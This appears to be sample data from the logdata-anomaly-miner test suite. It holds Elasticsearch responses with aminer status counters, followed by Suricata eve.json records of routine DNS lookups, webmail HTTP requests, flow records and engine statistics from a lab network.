{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"_zP0LXYBIkOurnXXSYi3","_score":1.0,"_source":{"FromTime":1.607088742920283E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":0,"/parser/model/type_str":0,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:32:32.977Z","ToTime":1.607088752920326E9,"fromtimestamp":"2020-12-04T13:32:22.920Z","totimestamp":"2020-12-04T13:32:32.920Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"AzP0LXYBIkOurnXXcYlB","_score":1.0,"_source":{"FromTime":1.60708875305248E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":6,"/parser/model/type_str":517,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:32:43.098Z","ToTime":1.607088763052544E9,"fromtimestamp":"2020-12-04T13:32:33.052Z","totimestamp":"2020-12-04T13:32:43.052Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"CTP0LXYBIkOurnXXmYl8","_score":1.0,"_source":{"FromTime":1.607088763350645E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":36,"/parser/model/type_str":1221,"/parser/model/php":0,"/parser/model/status_code":17,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:32:53.397Z","ToTime":1.607088773350717E9,"fromtimestamp":"2020-12-04T13:32:43.350Z","totimestamp":"2020-12-04T13:32:53.350Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"DTP0LXYBIkOurnXXwIn-","_score":1.0,"_source":{"FromTime":1.607088773468664E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":7,"/parser/model/type_str":461,"/parser/model/php":0,"/parser/model/status_code":2,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:33:03.511Z","ToTime":1.607088783468755E9,"fromtimestamp":"2020-12-04T13:32:53.468Z","totimestamp":"2020-12-04T13:33:03.468Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"EjP0LXYBIkOurnXX6ok5","_score":1.0,"_source":{"FromTime":1.607088784026072E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":22,"/parser/model/type_str":2426,"/parser/model/php":0,"/parser/model/status_code":3,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:33:14.066Z","ToTime":1.607088794026145E9,"fromtimestamp":"2020-12-04T13:33:04.026Z","totimestamp":"2020-12-04T13:33:14.026Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"GDP1LXYBIkOurnXXEYmz","_score":1.0,"_source":{"FromTime":1.607088794130318E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":8,"/parser/model/type_str":401,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:33:24.172Z","ToTime":1.60708880413046E9,"fromtimestamp":"2020-12-04T13:33:14.130Z","totimestamp":"2020-12-04T13:33:24.130Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"HDP1LXYBIkOurnXXOYks","_score":1.0,"_source":{"FromTime":1.607088804238838E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":6,"/parser/model/type_str":419,"/parser/model/php":0,"/parser/model/status_code":1,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:33:34.277Z","ToTime":1.607088814238905E9,"fromtimestamp":"2020-12-04T13:33:24.238Z","totimestamp":"2020-12-04T13:33:34.238Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"ITP1LXYBIkOurnXXYIlW","_score":1.0,"_source":{"FromTime":1.607088814261893E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":0,"/parser/model/type_str":0,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":3,"/parser/model/sp":0},"timestamp":"2020-12-04T13:33:44.303Z","ToTime":1.607088824261959E9,"fromtimestamp":"2020-12-04T13:33:34.261Z","totimestamp":"2020-12-04T13:33:44.261Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"JjP1LXYBIkOurnXXh4l_","_score":1.0,"_source":{"FromTime":1.607088824290643E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":7,"/parser/model/type_str":5347,"/parser/model/php":0,"/parser/model/status_code":1,"/parser/model/host":3,"/parser/model/sp":0},"timestamp":"2020-12-04T13:33:54.328Z","ToTime":1.607088834290724E9,"fromtimestamp":"2020-12-04T13:33:44.290Z","totimestamp":"2020-12-04T13:33:54.290Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"KzP1LXYBIkOurnXXsImn","_score":1.0,"_source":{"FromTime":1.607088834826981E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":46,"/parser/model/type_str":2788,"/parser/model/php":0,"/parser/model/status_code":11,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:34:04.864Z","ToTime":1.60708884482705E9,"fromtimestamp":"2020-12-04T13:33:54.826Z","totimestamp":"2020-12-04T13:34:04.827Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"LzP1LXYBIkOurnXX2Ik0","_score":1.0,"_source":{"FromTime":1.607088844951758E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":9,"/parser/model/type_str":538,"/parser/model/php":0,"/parser/model/status_code":1,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:34:14.989Z","ToTime":1.607088854951834E9,"fromtimestamp":"2020-12-04T13:34:04.951Z","totimestamp":"2020-12-04T13:34:14.951Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"NTP1LXYBIkOurnXX_4nQ","_score":1.0,"_source":{"FromTime":1.607088855090159E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":10,"/parser/model/type_str":653,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:34:25.129Z","ToTime":1.607088865090244E9,"fromtimestamp":"2020-12-04T13:34:15.090Z","totimestamp":"2020-12-04T13:34:25.090Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"OjP2LXYBIkOurnXXJ4lZ","_score":1.0,"_source":{"FromTime":1.607088865212616E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":5,"/parser/model/type_str":502,"/parser/model/php":0,"/parser/model/status_code":1,"/parser/model/host":0,"/parser/model/sp":0},"timestamp":"2020-12-04T13:34:35.250Z","ToTime":1.607088875212694E9,"fromtimestamp":"2020-12-04T13:34:25.212Z","totimestamp":"2020-12-04T13:34:35.212Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"PjP2LXYBIkOurnXXT4n4","_score":1.0,"_source":{"FromTime":1.607088875611484E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":5,"/parser/model/type_str":2205,"/parser/model/php":0,"/parser/model/status_code":0,"/parser/model/host":2,"/parser/model/sp":0},"timestamp":"2020-12-04T13:34:45.649Z","ToTime":1.607088885611568E9,"fromtimestamp":"2020-12-04T13:34:35.611Z","totimestamp":"2020-12-04T13:34:45.611Z","version":"1"}}]}} {"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"RDP2LXYBIkOurnXXeIkn","_score":1.0,"_source":{"FromTime":1.607088885898558E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":10,"/parser/model/type_str":1542,"/parser/model/php":0,"/parser/model/status_code":2,"/parser/model/host":2,"/parser/model/sp":0},"timestamp":"2020-12-04T13:34:55.936Z","ToTime":1.607088895898649E9,"fromtimestamp":"2020-12-04T13:34:45.898Z","totimestamp":"2020-12-04T13:34:55.898Z","version":"1"}}]}} 
{"_scroll_id":"FGluY2x1ZGVfY29udGV4dF91dWlkDXF1ZXJ5QW5kRmV0Y2gBFG8yVURGM2dCSWtPdXJuWFgtc0g2AAAAAAA6sgEWX0kwRUZiMXJRNS1ncW1KNkh4RU9iZw==","took":1,"timed_out":false,"terminated_early":true,"_shards":{"total":1,"successful":1,"skipped":0,"failed":0},"hits":{"total":{"value":3179,"relation":"eq"},"max_score":1.0,"hits":[{"_index":"aminer-statusinfo-2020.12.04","_type":"_doc","_id":"SDP2LXYBIkOurnXXoYl8","_score":1.0,"_source":{"FromTime":1.607088896465222E9,"StatusInfo":{"/parser/model/classification":0,"/parser/model/event_type_str":13,"/parser/model/type_str":3152,"/parser/model/php":0,"/parser/model/status_code":3,"/parser/model/host":2,"/parser/model/sp":0},"timestamp":"2020-12-04T13:35:06.517Z","ToTime":1.607088906465292E9,"fromtimestamp":"2020-12-04T13:34:56.465Z","totimestamp":"2020-12-04T13:35:06.465Z","version":"1"}}]}} logdata-anomaly-miner-2.6.1/aecid-testsuite/demo/aminerJsonInputDemo/json_logs/eve.json000066400000000000000000077225761437606560100313640ustar00rootroot00000000000000{"timestamp":"2020-02-29T00:00:01.041456+0000","flow_id":387009461891405,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46406,"proto":"UDP","dns":{"type":"answer","id":22103,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:00:01.041456+0000","flow_id":387009461891405,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46406,"proto":"UDP","dns":{"type":"answer","id":22103,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:00:01.126898+0000","flow_id":1265931569107445,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34680,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4768}} {"timestamp":"2020-02-29T00:00:02.592153+0000","flow_id":1136275096733977,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":35290,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":31668,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:00:02.626782+0000","flow_id":741056500184452,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52612,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/button-delete.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":117},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/button-delete.png","state":"CLOSED","stored":false,"size":117,"tx_id":16}} {"timestamp":"2020-02-29T00:00:02.697211+0000","flow_id":1136275096733977,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35290,"proto":"UDP","dns":{"type":"answer","id":31668,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:00:02.697211+0000","flow_id":1136275096733977,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35290,"proto":"UDP","dns":{"type":"answer","id":31668,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} 
{"timestamp":"2020-02-29T00:00:02.763084+0000","flow_id":741056500184452,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.81","src_port":52612,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":233,"tx_id":17}} {"timestamp":"2020-02-29T00:00:02.774030+0000","flow_id":741056500184452,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52612,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":17,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":4383}} {"timestamp":"2020-02-29T00:00:02.953009+0000","flow_id":741056500184452,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52612,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=horde&group=identities","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":4383},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":20182,"tx_id":17}} 
{"timestamp":"2020-02-29T00:00:02.955593+0000","flow_id":741056500184452,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52612,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":18,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/alerts\/success.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":469}} {"timestamp":"2020-02-29T00:00:03.906662+0000","flow_id":1193329442411942,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":35660,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":16131,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:00:04.000257+0000","flow_id":1959100616671748,"event_type":"flow","src_ip":"192.168.10.122","src_port":53493,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:55:02.459268+0000","end":"2020-02-28T23:55:02.570517+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:00:04.000559+0000","flow_id":2248594297295235,"event_type":"flow","src_ip":"192.168.10.122","src_port":34133,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-28T23:55:01.889219+0000","end":"2020-02-28T23:55:02.000453+0000","age":1,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:00:04.012140+0000","flow_id":1193329442411942,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35660,"proto":"UDP","dns":{"type":"answer","id":16131,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:00:04.012140+0000","flow_id":1193329442411942,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35660,"proto":"UDP","dns":{"type":"answer","id":16131,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:00:04.125348+0000","flow_id":715535805556464,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34682,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/nag\/task.php?actionID=add_task","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8620}} 
{"timestamp":"2020-02-29T00:00:06.000412+0000","event_type":"stats","stats":{"uptime":13658,"capture":{"kernel_packets":131656,"kernel_drops":0},"decoder":{"pkts":131666,"bytes":91548095,"invalid":175,"ipv4":130251,"ipv6":8,"ethernet":131666,"raw":0,"null":0,"sll":0,"tcp":125327,"udp":4735,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":695,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096768},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2642,"ssn_memcap_drop":0,"pseudo":338,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2658,"synack":2649,"rst":1192,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":134,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1689,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":99,"dcerpc_udp":0,"dns_udp":2157,"failed_udp":106},"tx":{"http":4364,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2233}},"flow_mgr":{"closed_pruned":2614,"new_pruned":15,"est_pruned":2207,"bypassed_pruned":0,"flows_checked":3,"flows_notimeout":1,"flows_timeout":2,"flows_timeout_inuse":0,"flows_removed":2,"rows_checked":65536,"rows_skipped":65533,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18849,"memcap_state":0,"memcap_global":0},"http":{"memuse":173458,"memcap":0}}} 
{"timestamp":"2020-02-29T00:00:06.130347+0000","flow_id":1265931569107445,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34680,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4768},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/","state":"CLOSED","stored":false,"size":20083,"tx_id":1}} {"timestamp":"2020-02-29T00:00:07.959552+0000","flow_id":741056500184452,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52612,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/alerts\/success.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":469},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/alerts\/success.png","state":"CLOSED","stored":false,"size":469,"tx_id":18}} {"timestamp":"2020-02-29T00:00:09.000169+0000","flow_id":1174723640053537,"event_type":"flow","src_ip":"192.168.10.130","src_port":34672,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":8,"bytes_toserver":1095,"bytes_toclient":6516,"start":"2020-02-28T23:59:02.216865+0000","end":"2020-02-28T23:59:07.421832+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:00:09.131516+0000","flow_id":715535805556464,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34682,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/task.php?actionID=add_task","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8620},"app_proto":"http","fileinfo":{"filename":"\/nag\/task.php","state":"CLOSED","stored":false,"size":34777,"tx_id":0}} {"timestamp":"2020-02-29T00:00:09.579471+0000","flow_id":1310461790902159,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":44297,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":62651,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:00:09.690288+0000","flow_id":1310461790902159,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44297,"proto":"UDP","dns":{"type":"answer","id":62651,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} 